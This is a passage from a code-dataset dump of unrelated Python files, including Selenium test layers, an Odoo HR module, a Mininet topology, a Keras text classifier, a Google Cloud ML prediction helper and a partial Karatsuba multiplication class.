np.zeros([target_size, target_size])\r\n for step, batch in enumerate(test_dataloader):\r\n batch = tuple(t.to(device) for t in batch)\r\n b_input_ids1, b_input_ids2, b_labels, input_role1, input_role2 = batch\r\n b_input_ids1 = b_input_ids1.squeeze(1).long()\r\n b_input_ids2 = b_input_ids2.squeeze(1).long()\r\n with torch.no_grad():\r\n text_embedding1 = embedding(input_ids=b_input_ids1, role_ids=input_role1)\r\n text_embedding2 = embedding(input_ids=b_input_ids2, role_ids=input_role2)\r\n pred = model.get_guess(text_embedding1, text_embedding2, input_role1, input_role2)\r\n size = pred.size()[0]\r\n for i in range(size):\r\n try:\r\n result[b_labels[i], label_from_output(pred[i])] += 1\r\n except:\r\n continue\r\n print(result)\r\n return result\r\n\r\n\r\n# 获取数据集\r\ndef get_dataloader(filenames):\r\n tokenizer = ElectraTokenizer.from_pretrained(args.vocab_dir)\r\n input_ids1 = []\r\n input_ids2 = []\r\n input_role1 = []\r\n input_role2 = []\r\n labels = []\r\n try:\r\n E1 = np.load(filenames+\"e1.npy\")\r\n E2 = np.load(filenames+\"e2.npy\")\r\n B1 = np.load(filenames+\"b1.npy\")\r\n B2 = np.load(filenames+\"b2.npy\")\r\n R = np.load(filenames+\"r.npy\")\r\n except:\r\n from data.get_relation_from_xml import get_rel_and_role\r\n data, _ = get_rel_and_role('data/CEC', tokenizer)\r\n # _, data = get_rel_and_role('data/CEC', tokenizer)\r\n E1 = data[0]\r\n E2 = data[1]\r\n B1 = data[2]\r\n B2 = data[3]\r\n R = data[4]\r\n for i in range(len(E1)):\r\n tmp1, _, _ = text2ids(tokenizer, E1[i], args.max_sent_len)\r\n tmp2, _, _ = text2ids(tokenizer, E2[i], args.max_sent_len)\r\n input_role1.append(convert_single_list(B1[i], args.max_sent_len, args.max_role_size))\r\n input_role2.append(convert_single_list(B2[i], args.max_sent_len, args.max_role_size))\r\n label = rel2label(R[i], args)\r\n input_ids1.append(tmp1)\r\n input_ids2.append(tmp2)\r\n labels.append(label)\r\n train_input1, validation_input1, train_input2, validation_input2, \\\r\n train_labels, validation_labels, input_role1, validation_input_role1,\\\r\n input_role2, validation_input_role2 = \\\r\n train_test_split(input_ids1, input_ids2, labels, input_role1, input_role2,\r\n random_state=args.seed, test_size=args.test_size)\r\n\r\n # 将训练集tensor并生成dataloader\r\n train_inputs1 = torch.Tensor(train_input1)\r\n train_inputs2 = torch.Tensor(train_input2)\r\n train_labels = torch.LongTensor(train_labels)\r\n inputs_role1 = torch.LongTensor(input_role1)\r\n inputs_role2 = torch.LongTensor(input_role2)\r\n batch_size = args.train_batch_size\r\n train_data = TensorDataset(train_inputs1, train_inputs2, train_labels, inputs_role1, inputs_role2)\r\n train_sampler = RandomSampler(train_data)\r\n train_dataloader = DataLoader(train_data,\r\n sampler=train_sampler,\r\n batch_size=batch_size)\r\n\r\n if args.test_size > 0:\r\n # 将验证集tensor并生成dataloader\r\n validation_inputs1 = torch.Tensor(validation_input1)\r\n validation_inputs2 = torch.Tensor(validation_input2)\r\n validation_labels = torch.LongTensor(validation_labels)\r\n validation_role1 = torch.LongTensor(validation_input_role1)\r\n validation_role2 = torch.LongTensor(validation_input_role2)\r\n validation_data = TensorDataset(validation_inputs1, validation_inputs2, validation_labels,\r\n validation_role1, validation_role2)\r\n validation_sampler = RandomSampler(validation_data)\r\n validation_dataloader = DataLoader(validation_data,\r\n sampler=validation_sampler,\r\n batch_size=batch_size)\r\n return train_dataloader, validation_dataloader\r\n else:\r\n return train_dataloader, _\r\n\r\ndef main():\r\n train_dataloader, validation_dataloader = get_dataloader(args.train_data_dir)\r\n embedding, model = mymodel_train(args, logger, train_dataloader, validation_dataloader)\r\n test_dataloader, _ = get_dataloader(args.test_data_dir)\r\n acc_records = mymodel_test(logger, test_dataloader)\r\n result = mymodel_cal(logger, test_dataloader)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"relation_with_role_classify_train.py","file_name":"relation_with_role_classify_train.py","file_ext":"py","file_size_in_byte":18856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"162819408","text":"#############################################################################\n#\n# Copyright (c) 2012 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\nfrom selenium.webdriver.firefox.firefox_profile import FirefoxProfile\nimport atexit\nimport gocept.selenium.wd_selenese\nimport os\nimport os.path\nimport selenium.webdriver\nimport sys\nimport warnings\n\n\n# work around Python 2.4 lack of absolute_import,\n# see gocept.selenium.seleniumrc for details\nplonetesting = __import__('plone.testing', {}, {}, [''])\n\n\nclass Layer(plonetesting.Layer):\n\n profile = None\n headless = False\n _browser = 'firefox'\n\n def setUp(self):\n if 'http_address' not in self:\n raise KeyError(\"No base layer has set self['http_address']\")\n\n browser = os.environ.get('GOCEPT_WEBDRIVER_BROWSER')\n headless = os.environ.get('GOCEPT_SELENIUM_HEADLESS')\n\n if headless is None or headless.lower() not in ['true', 'false']:\n warnings.warn('GOCEPT_SELENIUM_HEADLESS invalid. \\\n Possible values are true and false. Got: %s.\\\n Falling back to default (false).' %\n os.environ.get('GOCEPT_SELENIUM_HEADLESS'))\n headless = 'false'\n\n if headless.lower() == 'true':\n self.headless = True\n\n if browser is None or browser.lower() not in ['chrome', 'firefox']:\n warnings.warn('GOCEPT_WEBDRIVER_BROWSER invalid. \\\n Possible values are firefox and chrome. Got: %s.\\\n Falling back to firefox.' %\n os.environ.get('GOCEPT_WEBDRIVER_BROWSER'))\n browser = 'firefox'\n\n if browser.lower() == 'chrome':\n self._browser = 'chrome'\n else:\n self.profile = FirefoxProfile(\n os.environ.get(\n 'GOCEPT_WEBDRIVER_FF_PROFILE',\n os.environ.get('GOCEPT_SELENIUM_FF_PROFILE')))\n self.profile.native_events_enabled = True\n self.profile.update_preferences()\n\n self._start_selenium()\n atexit.register(self._stop_selenium)\n\n def tearDown(self):\n self._stop_selenium()\n # XXX upstream bug, quit should reset session_id\n self['seleniumrc'].session_id = None\n del self['seleniumrc']\n\n def _start_selenium(self):\n if self._browser == 'firefox':\n options = selenium.webdriver.FirefoxOptions()\n\n if self.headless:\n options.add_argument('-headless')\n\n self['seleniumrc'] = selenium.webdriver.Firefox(\n firefox_profile=self.profile, options=options)\n\n if self._browser == 'chrome':\n options = selenium.webdriver.ChromeOptions()\n options.add_argument('--disable-dev-shm-usage')\n\n if self.headless:\n options.add_argument('--headless')\n else:\n raise NotImplementedError(\n 'Chromedriver currently only works headless.')\n\n self['seleniumrc'] = selenium.webdriver.Chrome(\n options=options,\n service_args=['--log-path=chromedriver.log'])\n\n def _stop_selenium(self):\n # Only stop selenium if it is still active.\n if (self.get('seleniumrc') is None or\n self['seleniumrc'].session_id is None):\n return\n\n # Quit also removes the tempdir the ff profile is copied in.\n self['seleniumrc'].quit()\n\n\nclass WebdriverSeleneseLayer(plonetesting.Layer):\n\n _timeout = int(os.environ.get('GOCEPT_SELENIUM_TIMEOUT', 30))\n\n def setUp(self):\n self['selenium'] = gocept.selenium.wd_selenese.Selenese(\n self['seleniumrc'], self['http_address'], self._timeout)\n\n def testSetUp(self):\n # BBB reset settings\n self['selenium'].setTimeout(self._timeout * 1000)\n class_ = gocept.selenium.wd_selenese.Selenese\n for name in ['screenshot_directory', 'capture_screenshot']:\n setattr(self['selenium'], name, getattr(class_, name))\n\n def tearDown(self):\n del self['selenium']\n\n\nclass IntegrationBase(object):\n\n # hostname and port of the local application.\n host = os.environ.get('GOCEPT_SELENIUM_APP_HOST', 'localhost')\n port = int(os.environ.get('GOCEPT_SELENIUM_APP_PORT', 0))\n\n def __init__(self, *args, **kw):\n kw['module'] = sys._getframe(1).f_globals['__name__']\n super(IntegrationBase, self).__init__(*args, **kw)\n self.SELENIUM_LAYER = Layer(\n name='IntegratedSeleniumLayer', bases=[self])\n self.SELENESE_LAYER = WebdriverSeleneseLayer(\n name='IntegratedSeleneseLayer', bases=[self.SELENIUM_LAYER])\n\n def make_layer_name(self, bases):\n if bases:\n base = bases[0]\n name = '(%s.%s)' % (base.__module__, base.__name__)\n else:\n name = self.__class__.__name__\n return name\n\n def setUp(self):\n super(IntegrationBase, self).setUp()\n self.SELENIUM_LAYER.setUp()\n self.SELENESE_LAYER.setUp()\n self['seleniumrc'] = self.SELENIUM_LAYER['seleniumrc']\n\n def tearDown(self):\n self.SELENESE_LAYER.tearDown()\n self.SELENIUM_LAYER.tearDown()\n del self['seleniumrc']\n super(IntegrationBase, self).tearDown()\n\n def testSetUp(self):\n super(IntegrationBase, self).testSetUp()\n self.SELENIUM_LAYER.testSetUp()\n self.SELENESE_LAYER.testSetUp()\n self['selenium'] = self.SELENESE_LAYER['selenium']\n\n def testTearDown(self):\n self.SELENESE_LAYER.testTearDown()\n self.SELENIUM_LAYER.testTearDown()\n super(IntegrationBase, self).testTearDown()\n\n\nclass WebdriverSeleneseTestCase(object):\n\n @property\n def selenium(self):\n return self.layer['selenium']\n","sub_path":"src/gocept/selenium/webdriver.py","file_name":"webdriver.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"183949983","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, exceptions\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n# TODO: All HR fields integrated to partner and user: Address\n# TODO: Separate Employee and Personal information.\n# STARTED: Force Employees to have partner records.\n# TODO: On install, search for mismatched fields and ask the user which to keep.\n# TODO: On install search for records with matching names and ask if the user would like to link. This should be optional.\n# TODO: Separate work and personal records and persist data\n\nclass Users(models.Model):\n\t_inherit = 'res.users'\n\n\thr_id = fields.Many2one(related=\"partner_id.hr_id\", inherited=True)\n\n\t# Automatically create an employee record when you create a user with any of the HR group permissions.\n\t@api.model\n\tdef create(self, vals):\n\t\tres = super(Users, self).create(vals)\n\t\tnew_rec = self.browse(res.id)\n\t\thr_cat = self.env['ir.module.category'].search([('name', '=like', 'Human Resources')]).id\n\t\thr_groups = self.env['res.groups'].search([('category_id', '=', hr_cat)]).ids\n\n\t\t# Check to see if the new rec is in any of the employee permissions groups\n\t\tfor rec in new_rec.groups_id.ids:\n\t\t\t# If it is run the inner function\n\t\t\tif rec in hr_groups:\n\t\t\t\tnew_vals = {'user_id': res.id, 'name': res.name}\n\t\t\t\t\n\t\t\t\tdef create_employee(new_vals):\n\t\t\t\t\t# Create an employee record\n\t\t\t\t\tnew_res = self.env['hr.employee'].create(new_vals)\n\t\t\t\t\t# Sets hr_id field of user rec's associated partner to the new employee(hr) record\n\t\t\t\t\tnew_rec.partner_id.hr_id = new_res.id\n\t\t\t\t\treturn new_res\n\n\t\t\t\t# To prevent recursion, make sure an employee doesn't already exist\n\t\t\t\tif new_rec.partner_id.hr_id.id == False:\n\t\t\t\t\tcreate_employee(new_vals)\n\n\t\t\t\tbreak\n\t\treturn res\n\n\t# If the user name and employee name aren't equal, set the employee name to the user name.\n\t@api.multi\n\tdef write(self, vals):\n\t\tres = super(Users, self).write(vals)\n\t\tfor rec in self:\n\t\t\tif rec.hr_id.id != False and rec.hr_id.name != rec.name:\n\t\t\t\trec.hr_id.write({'name': rec.name})\n\t\treturn res\n\nclass Employee(models.Model):\n\t_inherit = 'hr.employee'\n\n\tpartner_id = fields.Many2one('res.partner', related='user_id.partner_id')\n\tstreet = fields.Char('Street', related='partner_id.street')\n\tstreet2 = fields.Char('Street2', related='partner_id.street2')\n\tzip = fields.Char('Zip', size=24, change_default=True, related='partner_id.zip')\n\tcity = fields.Char('City', related='partner_id.city')\n\tstate_id = fields.Many2one('res.country.state', 'State', related='partner_id.state_id', ondelete='restrict')\n\tcountry_id = fields.Many2one('res.country', 'Country', related='partner_id.country_id', ondelete='restrict')\n\tphone = fields.Char(\"Personal Phone\", related=\"partner_id.phone\")\n\temail = fields.Char(\"Personal Email\", related=\"partner_id.email\")\n\tmobile = fields.Char(related=\"partner_id.mobile\")\n\twork_phone = fields.Char(\"Work Phone\")\n\twork_email = fields.Char(\"Work Email\")\n\timage = fields.Binary(related=\"partner_id.image\")\n\timage_small = fields.Binary(related=\"partner_id.image_small\")\n\timage_medium = fields.Binary(related=\"partner_id.image_medium\")\n\n\n\t# If the employee name and partner name aren't equal, set the partner name to equal the employee name\n\t# Cascades to user name\n\t@api.multi\n\tdef write(self, vals):\n\t\tres = super(Employee, self).write(vals)\n\t\tfor rec in self:\n\t\t\tif rec.user_id.id != False and rec.partner_id.name != rec.name:\n\t\t\t\trec.partner_id.write({'name': rec.name})\n\t\treturn res\n\n\t@api.onchange('user_id')\n\t@api.multi\n\tdef set_user_id_hr_id(self):\n\t\tfor rec in self:\n\t\t\t# Set hr_id when changing the user_id.\n\t\t\tif rec.user_id.partner_id.id and rec.user_id.partner_id.hr_id.id != rec.id:\n\t\t\t\trec.user_id.partner_id.hr_id = rec.id\n\t\t\t# Automatically set the company of the partner to the user's company\n\t\t\tif rec.user_id.id != False and rec.user_id.partner_id.parent_id != rec.user_id.company_id:\n\t\t\t\trec.user_id.partner_id.parent_id = rec.user_id.company_id.id\n\n\t# Run set_user_id_hr_id for all sercords\n\t@api.multi\n\tdef set_all_user_id_hr_id(self):\n\t\tfor rec in self.search([]):\n\t\t\trec.set_user_id_hr_id()\n\n\t# Test if there are inequalities between fields of already linked records\n\t@api.multi\n\tdef compare_fields(self):\n\t\tfields = ['name',\n\t\t\t'street',\n\t\t\t'street2',\n\t\t\t'zip',\n\t\t\t'city',\n\t\t\t'state_id',\n\t\t\t'country_id',\n\t\t\t'phone',\n\t\t\t'email',\n\t\t\t'mobile',\n\t\t\t'image',\n\t\t\t]\n\t\tfor employee in self:\n\t\t\tineq_fields = []\n\t\t\tfor field in fields:\n\t\t\t\temployee_field = getattr(employee, field)\n\t\t\t\tpartner_field = getattr(employee.partner_id, field)\n\t\t\t\tif employee_field != partner_field:\n\t\t\t\t\tineq_fields.append(field)\n\t\t\tif ineq_fields:\n\t\t\t\treturn ineq_fields\n\t\t\telse:\n\t\t\t\treturn\n\n\t# Run compare_fields for all currently linked records\n\t@api.multi\n\tdef compare_all_fields(self):\n\t\tineq = {}\n\t\tfor rec in self.search([('user_id.id', '!=', False)]):\n\t\t\tcompare = rec.compare_fields()\n\t\t\tif compare:\n\t\t\t\tineq[rec] = compare\n\t\tif ineq:\n\t\t\treturn ineq\n\t\telse:\n\t\t\treturn\n\n\t# Methods to run on module installation\n\t@api.model\n\tdef on_install(self):\t\n\t\t# self.set_all_user_id_hr_id()\n\t\t# todo = self.env['ir.actions.todo']\n\t\t# action_rec = self.env['ir.model.data'].xmlid_to_object('hr_auto_create.action_hr_auto_installer')\n\t\t# _logger.info('OVER 9000')\n\t\t# if action_rec:\n\t\t# \ttodo_rec = todo.create({'action_id': action_rec.id, 'name': 'Comparison Results', 'type': 'automatic'})\n\t\treturn\n\t\t\n\nclass Partner(models.Model):\n\t_inherit = 'res.partner'\n\n\tfunction = fields.Char(compute=\"_get_function\", store=True)\n\tdisp_function = fields.Char('Job Position')\n\thr_id = fields.Many2one('hr.employee')\n\thr_function = fields.Many2one('hr.job', related='hr_id.job_id')\t\n\n\t# If the partner name and employee name aren't equal, set the employee name to the partner name.\n\t@api.multi\n\tdef write(self, vals):\n\t\tres = super(Partner, self).write(vals)\n\t\tfor rec in self:\n\t\t\tif rec.hr_id.id != False and rec.hr_id.name != rec.name:\n\t\t\t\trec.hr_id.write({'name': rec.name})\n\t\treturn res\n\n\t# Sets function field to employee function or character field depending on whether there's a linked HR rec.\n\t@api.depends('hr_function', 'disp_function', 'hr_id.job_id')\n\t@api.multi\n\tdef _get_function(self):\n\t\tfor rec in self:\n\t\t\trec.function = ''\n\t\t\tif rec.hr_function.id != False:\n\t\t\t\trec.function = '%s'%rec.hr_function.name\n\t\t\telif rec.disp_function != False:\n\t\t\t\trec.function = rec.disp_function\n\t\t\telse:\n\t\t\t\treturn\n\n\n\t# This is an example of how to do something if only if iterating through a list doesn't return what you want.\n\t# @api.multi\n\t# def parse_conflicting_fields(self):\n\t# \tfields = ('name',\n\t# \t\t'street',\n\t# \t\t'street2',\n\t# \t\t'zip',\n\t# \t\t'city',\n\t# \t\t'state_id',\n\t# \t\t'country_id',\n\t# \t\t'phone',\n\t# \t\t'email',\n\t# \t\t'mobile',\n\t# \t\t'image',\n\t# \t\t)\n\t# \tfor employee in self:\n\t# \t\tineq_fields = []\n\t# \t\tfor field in fields:\n\t# \t\t\temployee_field = getattr(employee, field)\n\t# \t\t\tpartner_field = getattr(employee.partner_id, field)\n\t# \t\t\tif employee_field != partner_field:\n\t# \t\t\t\t_logger.info('Inequality for %s.%s'%(employee,field))\n\t# \t\t\t\tineq_fields.append(field)\n\t# \t\t\telse:\n\t# \t\t\t\tcontinue\n\t# \t\telse:\n\t# \t\t\tif not ineq_fields:\n\t# \t\t\t\t_logger.info('No inequalities found for %s'%employee)\n\t# \t\t\telse:\n\t# \t\t\t\treturn ineq_fields\n\n\n","sub_path":"models/hr_auto_create.py","file_name":"hr_auto_create.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"345081572","text":"from mininet.topo import Topo\r\nfrom mininet.net import Mininet\r\nfrom mininet.node import CPULimitedHost\r\nfrom mininet.link import TCLink\r\nfrom mininet.util import dumpNodeConnections\r\nfrom mininet.log import setLogLevel\r\nfrom mininet.cli import CLI\r\n\r\n\r\nclass SingleSwitchTopo(Topo):\r\n \"Single switch connected to n hosts.\"\r\n\r\n def __init__(self, n=2, **opts):\r\n Topo.__init__(self, **opts)\r\n switch = self.addSwitch('s1')\r\n for h in range(n):\r\n # Each host gets 50%/n of system CPU\r\n host = self.addHost('h%s' % (h + 1))\r\n # 10 Mbps, 5ms delay, 0% Loss, 1000 packet queue\r\n self.addLink(host, switch, bw=10, delay='5ms', loss=0, max_queue_size=1000, use_htb=False)\r\n\r\n\r\ndef perfTest():\r\n \"Create network and run simple performance test\"\r\n topo = SingleSwitchTopo(n=4)\r\n net = Mininet(topo=topo, link=TCLink)\r\n net.start()\r\n # print(\"Dumping host connections\")\r\n # dumpNodeConnections(net.hosts)\r\n # print(\"Testing network connectivity\")\r\n # net.pingAll()\r\n # print(\"Testing bandwidth between h1 and h4\")\r\n # h1, h4 = net.get('h1', 'h4')\r\n # net.iperf((h1, h4))\r\n CLI(net)\r\n net.stop()\r\n\r\n\r\nif __name__ == '__main__':\r\n setLogLevel('info')\r\n perfTest()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"204824456","text":"from keras.models import Sequential\nfrom keras import layers\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.text import Tokenizer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import LabelEncoder\n\nfrom keras.models import Sequential\nfrom keras import layers\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfilepath_dict = {'yelp': 'sentiment_analysis/yelp_labelled.txt',\n 'amazon': 'sentiment_analysis/amazon_cells_labelled.txt',\n 'imdb': 'sentiment_analysis/imdb_labelled.txt'}\ndf_list = []\nfor source, filepath in filepath_dict.items():\n df = pd.read_csv(filepath, names=['sentence', 'label'], sep='\\t')\n df['source'] = source # Add another column filled with the source name\n df_list.append(df)\ndf = pd.concat(df_list)\nprint(df.iloc[0])\n\n\ndf_yelp = df[df['source'] == 'yelp']\n\nsentences = df_yelp['sentence'].values\ny = df_yelp['label'].values\n\nsentences_train, sentences_test, y_train, y_test = train_test_split(\n sentences, y, test_size=0.25, random_state=1000)\n\n\ntokenizer = Tokenizer(num_words=5000)\ntokenizer.fit_on_texts(sentences_train)\n\nX_train = tokenizer.texts_to_sequences(sentences_train)\nX_test = tokenizer.texts_to_sequences(sentences_test)\ntest_sent = [\"This movie was nearly perfect. I only had one complaint.\"]\ntest = tokenizer.texts_to_sequences(test_sent)\nprint(test_sent)\nprint(test)\nprint(\"---------------------------\")\nvocab_size = len(tokenizer.word_index) + 1 # Adding 1 because of reserved 0 index\n\nprint(sentences_train[2])\nprint(X_train[2])\n\nmaxlen = 100\n\nX_train = pad_sequences(X_train, padding='post', maxlen=maxlen)\nX_test = pad_sequences(X_test, padding='post', maxlen=maxlen)\ntest = pad_sequences(test, padding='post', maxlen=maxlen)\n\ndef create_embedding_matrix(filepath, word_index, embedding_dim):\n vocab_size = len(word_index) + 1 # Adding again 1 because of reserved 0 index\n embedding_matrix = np.zeros((vocab_size, embedding_dim))\n\n with open(filepath,'r', encoding='UTF8') as f:\n for line in f:\n word, *vector = line.split()\n if word in word_index:\n idx = word_index[word]\n embedding_matrix[idx] = np.array(\n vector, dtype=np.float32)[:embedding_dim]\n\n return embedding_matrix\nembedding_dim = 50\nembedding_matrix = create_embedding_matrix(\n 'glove.6B.50d.txt',\n tokenizer.word_index, embedding_dim)\n\n\nmodel = Sequential()\nmodel.add(layers.Embedding(vocab_size, embedding_dim,\n weights=[embedding_matrix],\n input_length=maxlen,\n trainable=True))\nmodel.add(layers.Conv1D(128, 5, activation='relu'))\nmodel.add(layers.GlobalMaxPooling1D())\nmodel.add(layers.Dense(10, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\nhistory = model.fit(X_train, y_train,\n epochs=10,\n verbose=False,\n validation_data=(X_test, y_test),\n batch_size=10)\nloss, accuracy = model.evaluate(X_train, y_train, verbose=False)\nprint(\"Training Accuracy: {:.4f}\".format(accuracy))\nloss, accuracy = model.evaluate(X_test, y_test, verbose=False)\nprint(\"Testing Accuracy: {:.4f}\".format(accuracy))\nynew = model.predict_classes(test)\nprint(ynew)\nfor i in range(len(test)):\n\tprint(\"X=%s, Predicted=%s\" % (test[i], ynew[i]))\nynew = model.predict_proba(test)\nfor i in range(len(test)):\n\tprint(\"X=%s, Predicted=%s\" % (test[i], ynew[i]))","sub_path":"testCNN/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"622596402","text":"import arcpy, sys, os\r\n\r\n#Set up variables\r\narcpy.env.overwriteOutput = True\r\ninputfile = sys.argv[1]\r\noutputfile = os.path.dirname(inputfile) + \"/\" + \"outPoints.shp\"\r\n\r\n#Find a point based on the input\r\narcpy.FeatureToPoint_management(inputfile, outputfile)\r\n\r\n##Set the output parameter\r\n\r\n\r\n","sub_path":"example_scripts/feature2point.py","file_name":"feature2point.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"461560247","text":"#coding=utf-8\n# author: Huan Shuwen\n# time : 2019/12/17 下午2:43\n# file : mine\n\"\"\"\nNOTICE:\n匹配最长前缀\n1、暴力,一个字母一个字母往后尝试\n2、折半对比:以最短的字符串为基础,对比前半段,然后再折半\n# 扩展,如果是最长子串呢?\n\"\"\"\nimport numpy as np\ndef longest_prefix(list):\n shortest_str_index = np.argmin(map(lambda x:len(x),list))\n shortest_str=list[shortest_str_index]\n head_point = 0\n tail_point = len(shortest_str)/2+1\n max_tail_point = 0\n # 终止条件:\n while head_point 0 else 0,\n (dp[i - 2] if i > 1 else 0) + nums[i])\n return dp[-1]\n\n\n# 简化版\ndef _solve1(nums):\n last = now = 0\n for num in nums:\n last, now = now, max(now, last + num)\n return now\n\n\nif __name__ == '__main__':\n print (_solve1([]))\n print (_solve1([1]))\n print (_solve1([2, 6, 3, 2, 2]))\n","sub_path":"easy/198.py","file_name":"198.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"648826054","text":"from otma.apps.core.commons.validators import email_dangerous_symbols_validator, email_format_validator\nfrom django.conf import settings\nfrom django import forms\n\n\nclass FieldFirstName(forms.Form):\n first_name = forms.CharField(\n label=\"Primeiro nome\",\n max_length=30,\n required=True,\n error_messages=settings.ERRORS_MESSAGES,\n widget=forms.TextInput(\n attrs={\n 'id': 'first_name','name':'first_name', 'class': \"form-control\", 'v-model':'first_name', 'type': 'text',\n 'autocomplete': \"off\",'required': \"required\",\n }\n )\n )\n\n\nclass FieldFamilyName(forms.Form):\n family_name = forms.CharField(\n label=\"Sobrenome\",\n max_length=30,\n required=True,\n error_messages=settings.ERRORS_MESSAGES,\n widget=forms.TextInput(\n attrs={\n 'id': 'family_name','name':'family_name', 'class': \"form-control\", 'v-model':'family_name', 'type': 'text',\n 'autocomplete': \"off\",'required': \"required\",\n }\n )\n )\n\n\nclass FieldEmail(forms.Form):\n email = forms.EmailField(\n label=\"Email\",\n max_length=256,\n required=True,\n validators=[email_format_validator, email_dangerous_symbols_validator],\n error_messages=settings.ERRORS_MESSAGES,\n widget=forms.TextInput(\n attrs={\n 'type': \"text\", 'class': \"form-control text-lowercase\", 'id': 'email',\n 'v-model': 'email', 'autocomplete': \"off\", 'placeholder': \"\",'required': \"true\"\n }\n )\n )","sub_path":"otma/apps/core/commons/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"459888516","text":"# USAGE\n# python test_network.py --model santa_not_santa.model --image examples/santa_01.png\n# python test_network.py --model furnace_not_furnace.model --image examples/santa_01.png\n# import the necessary packages\n\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\nimport googleapiclient.discovery\nfrom apiclient import discovery\nfrom google.api_core.client_options import ClientOptions\nimport os\n\nroot_path = os.path.dirname(os.path.abspath(__file__))\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = root_path+\"/My First Project-580d9a3220f1.json\" #API\n\n\n\ndef predict_json(project, region, model, instances, version=None):\n \"\"\"Send json data to a deployed model for prediction.\n\n Args:\n project (str): project where the Cloud ML Engine Model is deployed.\n region (str): regional endpoint to use; set to None for ml.googleapis.com\n model (str): model name.\n instances ([Mapping[str: Any]]): Keys should be the names of Tensors\n your deployed model expects as inputs. Values should be datatypes\n convertible to Tensors, or (potentially nested) lists of datatypes\n convertible to tensors.\n version: str, version of the model to target.\n Returns:\n Mapping[str: any]: dictionary of prediction results defined by the\n model.\n \"\"\"\n # Create the ML Engine service object.\n # To authenticate set the environment variable\n # GOOGLE_APPLICATION_CREDENTIALS=\n prefix = \"{}-ml\".format(region) if region else \"ml\"\n api_endpoint = \"https://{}.googleapis.com\".format(prefix)\n client_options = ClientOptions(api_endpoint=api_endpoint)\n service = googleapiclient.discovery.build(\n 'ml', 'v1', client_options=client_options)\n name = 'projects/{}/models/{}'.format(project, model)\n\n if version is not None:\n name += '/versions/{}'.format(version)\n\n response = service.projects().predict(\n name=name,\n body={'instances': instances}\n ).execute()\n\n print(response)\n\n if 'error' in response:\n raise RuntimeError(response['error'])\n\n return response['predictions']\n\n\n\n\ndef is_furnace(image_array):\n # pre-process the image for classification\n\n\n prediction = predict_json('trusty-moment-288519','us-central1', 'furnace_not_furnace', image_array)\n\n\n # classify the input image\n (not_furnace, furnace) = prediction[0]\n print(furnace)\n\n # build the label\n label = \"Furnace\" if furnace > not_furnace else \"Not Furnace\"\n proba = furnace if furnace > not_furnace else not_furnace\n\n return [label,proba]\n","sub_path":"benchmarking_tool/furnace_detect.py","file_name":"furnace_detect.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"613122471","text":"\"\"\"\n Simple Karatsuba multiplication\n\"\"\"\n\n\nclass Multiply:\n \"\"\"\n This class implements Karatsuba multiplication using a\n recursive approach\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def _pad_zeros(num: str, n_zeros: int, at_front=False) -> str:\n \"\"\"\n takes in an string, returns padded string (at end or front)\n \"\"\"\n zeros = '0' * n_zeros\n if at_front:\n return zeros + num\n return num + zeros\n\n def recursive_karatsuba_multiplication(self, num1: int, num2: int) -> int:\n \"\"\"\n Takes in 2 integers, multiplies them recursively using\n karatsuba multiplication formula\n \"\"\"\n num1, num2 = str(num1), str(num2)\n len_num1 = len(num1)\n len_num2 = len(num2)\n if len_num1 != len_num2:\n if len_num1 > len_num2:\n num2 = Multiply._pad_zeros(\n str(num2), len_num1 - len_num2, at_front=True)\n else:\n num1 = Multiply._pad_zeros(\n str(num1), len_num2 - len_num1, at_front=True)\n # length may changed here.\n # However, we now have both num1 and num2 of same length\n len_num = len(num1)\n\n if len_num == 1:\n return int(num1) * int(num2)\n\n # split the num1, num2 into a, b, c, d\n a_s, b_s = num1[:len_num // 2], num1[len_num // 2:]\n c_s, d_s = num2[:len_num // 2], num2[len_num // 2:]\n a, b, c, d = int(a_s), int(b_s), int(c_s), int(d_s)\n\n # step1: comupute ac\n ac = self.recursive_karatsuba_multiplication(a, c)\n # step2: compute bd\n bd = self.recursive_karatsuba_multiplication(b, d)\n # step3 (Gauss trick): compute (ab * cd) to compute ab + bc\n ab_bc = 